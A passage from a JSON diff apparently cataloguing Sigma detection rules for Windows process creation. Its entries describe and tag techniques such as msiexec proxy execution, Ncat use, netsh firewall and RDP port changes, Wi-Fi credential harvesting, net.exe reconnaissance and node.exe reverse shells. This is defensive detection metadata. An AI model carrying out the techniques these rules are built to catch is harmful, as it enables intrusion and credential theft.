"Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", + "uuid": "4a2a2c3e-209f-4d01-b513-4155a540b469", + "value": "Suspicious MsiExec Embedding Parent", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_embedding.yml" + ], + "tags": [ + "attack.t1218.007", + "attack.defense_evasion" + ], + "creation_date": "2022/04/16", + "filename": "proc_creation_win_msiexec_embedding.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "uuid": "6f4191bb-912b-48a8-9ce7-682769541e6d", + "value": "Suspicious Msiexec Execute Arbitrary DLL", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://twitter.com/_st0pp3r_/status/1583914515996897281", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ], + "creation_date": "2022/01/16", + "filename": "proc_creation_win_msiexec_execute_dll.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate script" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious 
payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "uuid": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", + "value": "Suspicious Msiexec Quiet Install", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://twitter.com/_st0pp3r_/status/1583914244344799235", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ], + "creation_date": "2022/01/16", + "filename": "proc_creation_win_msiexec_install_quiet.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate script" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "uuid": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", + "value": "Suspicious Msiexec Quiet Install From Remote Location", + "meta": { + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ], + "creation_date": "2022/10/28", + "filename": "proc_creation_win_msiexec_install_remote.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects process injection using Microsoft Remote Asssistance (Msra.exe) which has been 
used for discovery and persistence tactics", + "uuid": "744a188b-0415-4792-896f-11ddb0588dbc", + "value": "Msra.exe Process Injection", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", + "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ], + "creation_date": "2022/06/24", + "filename": "proc_creation_win_msra_process_injection.yml", + "author": "Alexander McDonald", + "level": "high", + "falsepositive": [ + "Legitimate use of Msra.exe" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", + "uuid": "954f0af7-62dd-418f-b3df-a84bc2c7a774", + "value": "Remote Desktop Protocol Use Mstsc", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.001" + ], + "creation_date": "2022/01/07", + "filename": "proc_creation_win_mstsc.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "WSL (Windows Sub System For Linux)", + "Other currently unknown software" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects multiple suspicious process in a limited timeframe", 
+ "uuid": "61ab5496-748e-4818-a92f-de78e20fe7f1", + "value": "Quick Execution of a Series of Suspicious Commands", + "meta": { + "refs": [ + "https://car.mitre.org/wiki/CAR-2013-04-002", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_multiple_susp_cli.yml" + ], + "tags": [ + "car.2013-04-002", + "attack.execution", + "attack.t1059" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_multiple_susp_cli.yml", + "author": "juju4", + "level": "low", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "uuid": "e31033fc-33f0-4020-9a16-faf9b31cbf08", + "value": "Ncat Execution", + "meta": { + "refs": [ + "https://nmap.org/ncat/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netcat_execution.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1095" + ], + "creation_date": "2021/07/21", + "filename": "proc_creation_win_netcat_execution.yml", + "author": "frack113, Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate ncat use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects netsh commands that opens the port 3389 used for RDP, used in Sarwent Malware", + "uuid": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "value": "Netsh RDP Port Opening", + "meta": { + "refs": [ + "https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_allow_port_rdp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "creation_date": "2020/05/23", + "filename": "proc_creation_win_netsh_allow_port_rdp.yml", + "author": "Sander Wiebing", + "level": "high", + "falsepositive": [ + "Legitimate administration" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Allow Incoming Connections by Port or Application on Windows Firewall", + "uuid": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "value": "Netsh Port or Application Allowed", + "meta": { + "refs": [ + "https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "creation_date": "2019/01/29", + "filename": "proc_creation_win_netsh_fw_add.yml", + "author": "Markus Neis, Sander Wiebing", + "level": "medium", + "falsepositive": [ + "Legitimate administration" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Netsh commands that allows a suspcious application location on Windows Firewall", + "uuid": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "value": "Netsh Program Allowed with Suspcious Location", + "meta": { + "refs": [ + "https://www.virusradar.com/en/Win32_Kasidet.AD/description", + "https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + 
"creation_date": "2020/05/25", + "filename": "proc_creation_win_netsh_fw_add_susp_image.yml", + "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate administration" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", + "uuid": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", + "value": "Netsh Firewall Rule Deletion", + "meta": { + "refs": [ + "https://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "creation_date": "2022/08/14", + "filename": "proc_creation_win_netsh_fw_delete.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate administration" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", + "uuid": "347906f3-e207-4d18-ae5b-a9403d6bcdef", + "value": "Netsh Allow Group Policy on Microsoft Defender Firewall", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall", + "https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "creation_date": "2022/01/09", + "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml", + 
"author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate administration" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects capture a network trace via netsh.exe trace functionality", + "uuid": "d3c3861d-c504-4c77-ba55-224ba82d0118", + "value": "Capture a Network Trace with netsh.exe", + "meta": { + "refs": [ + "https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_netsh_packet_capture.yml", + "author": "Kutepov Anton, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administrator or user uses netsh.exe trace functionality for legitimate reason" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects netsh commands that configure a port forwarding (PortProxy)", + "uuid": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", + "value": "Netsh Port Forwarding", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://adepts.of0x.cc/netsh-portproxy-code/", + "https://www.dfirnotes.net/portproxy_detection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" + ], + "creation_date": "2019/01/29", + "filename": "proc_creation_win_netsh_port_fwd.yml", + "author": "Florian Roth, omkar72, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate 
administration", + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects netsh commands that configure a port forwarding of port 3389 used for RDP", + "uuid": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "value": "Netsh RDP Port Forwarding", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd_3389.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" + ], + "creation_date": "2019/01/29", + "filename": "proc_creation_win_netsh_port_fwd_3389.yml", + "author": "Florian Roth, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate administration" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect the harvesting of wifi credentials using netsh.exe", + "uuid": "42b1a5b8-353f-4f10-b256-39de4467faff", + "value": "Harvesting of Wifi Credentials Using netsh.exe", + "meta": { + "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ], + "creation_date": "2020/04/20", + "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml", + "author": "Andreas Hunkeler (@Karneades), oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administrator or user uses netsh.exe wlan functionality for legitimate reason" + ], + 
"logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "uuid": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "value": "Use of NetSupport Remote Access Software", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsupport.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/09/25", + "filename": "proc_creation_win_netsupport.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", + "uuid": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", + "value": "Suspicious Scan Loop Network", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://ss64.com/nt/for.html", + "https://ss64.com/ps/foreach-object.htmll", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_scan_loop.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.discovery", + "attack.t1018" + ], + "creation_date": "2022/03/12", + "filename": "proc_creation_win_network_scan_loop.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate script" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.", + "uuid": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", + "value": "Network Sniffing", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_sniffing.yml" + ], + "tags": [ + "attack.credential_access", + "attack.discovery", + "attack.t1040" + ], + "creation_date": "2019/10/21", + "filename": "proc_creation_win_network_sniffing.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "low", + "falsepositive": [ + "Admin activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. 
For example 'enable' or 'disable' accounts or change the password...etc", + "uuid": "5b768e71-86f2-4879-b448-81061cbae951", + "value": "Suspicious Manipulation Of Default Accounts", + "meta": { + "refs": [ + "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ], + "creation_date": "2022/09/01", + "filename": "proc_creation_win_net_default_accounts_manipulation.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Some fasle positives could occure with the admin or guest account. It depends on the scripts being used by the admins in your env. 
If you experience a lot of FP you could reduce the level to medium" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Identifies attempts to enumerate hosts in a network using the built-in Windows net.exe tool.", + "uuid": "62510e69-616b-4078-b371-847da438cc03", + "value": "Windows Network Enumeration", + "meta": { + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_enum.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ], + "creation_date": "2018/10/30", + "filename": "proc_creation_win_net_enum.yml", + "author": "Endgame, JHasenbusch (ported for oscd.community)", + "level": "low", + "falsepositive": [ + "Legitimate use of net.exe utility by legitimate user" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", + "uuid": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", + "value": "Suspicious Reconnaissance Activity Using Net", + "meta": { + "refs": [ + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_net_recon.yml", + "author": "Florian Roth, omkar72, @svch0st, Nasreddine Bencherchali", + "level": "medium", + 
"falsepositive": [ + "Inventory tool runs", + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Identifies creation of local users via the net.exe command.", + "uuid": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", + "value": "Net.exe User Account Creation", + "meta": { + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ], + "creation_date": "2018/10/30", + "filename": "proc_creation_win_net_user_add.yml", + "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", + "level": "medium", + "falsepositive": [ + "Legitimate user creation.", + "Better use event IDs for user creation rather than command line rules." 
+ ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", + "uuid": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "value": "Net.exe User Account Creation - Never Expire", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ], + "creation_date": "2022/07/12", + "filename": "proc_creation_win_net_user_add_never_expire.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an admin share is mounted using net.exe", + "uuid": "3abd6094-7027-475f-9630-8ab9be7b9725", + "value": "Mounted Windows Admin Shares with net.exe", + "meta": { + "refs": [ + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_admin_share.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2020/10/05", + "filename": "proc_creation_win_net_use_admin_share.yml", + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", + "level": "medium", + "falsepositive": [ + "Administrators" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "uuid": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "value": "New Network Provider - CommandLine", + "meta": { + "refs": [ + 
"https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_network_provider.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "creation_date": "2022/08/23", + "filename": "proc_creation_win_new_network_provider.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Other legitimate network providers used and not filtred in this rule" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of a new service.", + "uuid": "7fe71fc9-de3b-432a-8d57-8c809efc10ab", + "value": "New Service Creation", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_service_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2019/10/21", + "filename": "proc_creation_win_new_service_creation.yml", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administrator or user creates a service for legitimate reasons." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of nimgrab, a tool bundled with the Nim programming framework, downloading a file. 
This can be normal behaviour on developer systems.", + "uuid": "74a12f18-505c-4114-8d0b-8448dd5485c6", + "value": "Nimgrab File Download", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nimgrab.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/08/28", + "filename": "proc_creation_win_nimgrab.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Legitimate use of Nim on developer systems" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects nltest commands that can be used for information discovery", + "uuid": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "value": "Recon Activity with NLTEST", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", + "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", + "https://attack.mitre.org/techniques/T1482/", + "https://attack.mitre.org/techniques/T1016/", + "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016", + "attack.t1482" + ], + "creation_date": "2021/07/24", + "filename": "proc_creation_win_nltest_recon.yml", + "author": "Craig Young, oscd.community, Georg Lauenstein", + "level": "medium", + "falsepositive": [ + "Legitimate administration use but user must be check out" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the 
execution node.exe which is shipped with multiple softwares such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", + "uuid": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "value": "Node.exe Process Abuse", + "meta": { + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return", + "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", + "https://nodejs.org/api/cli.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2022/09/09", + "filename": "proc_creation_win_node_abuse.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects non-interactive PowerShell activity by looking at powershell.exe with not explorer.exe as a parent.", + "uuid": "f4bbd493-b796-416e-bbf2-121235348529", + "value": "Non Interactive PowerShell", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_non_interactive_powershell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/09/12", + "filename": "proc_creation_win_non_interactive_powershell.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)", + "level": "low", + "falsepositive": [ + "Legitimate programs executing PowerShell scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Search for 
usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "uuid": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "value": "Non-privileged Usage of Reg or Powershell", + "meta": { + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_non_priv_reg_or_ps.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/10/05", + "filename": "proc_creation_win_non_priv_reg_or_ps.yml", + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of NPS a port forwarding tool", + "uuid": "68d37776-61db-42f5-bf54-27e87072d17e", + "value": "NPS Tunneling Tool", + "meta": { + "refs": [ + "https://github.com/ehang-io/nps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nps.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ], + "creation_date": "2022/10/08", + "filename": "proc_creation_win_nps.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of powershell in conjunction with nslookup as a mean of download.", + "uuid": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", + "value": "Nslookup PowerShell Download", + "meta": { + "refs": [ + "https://twitter.com/Alh4zr3d/status/1566489367232651264", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": 
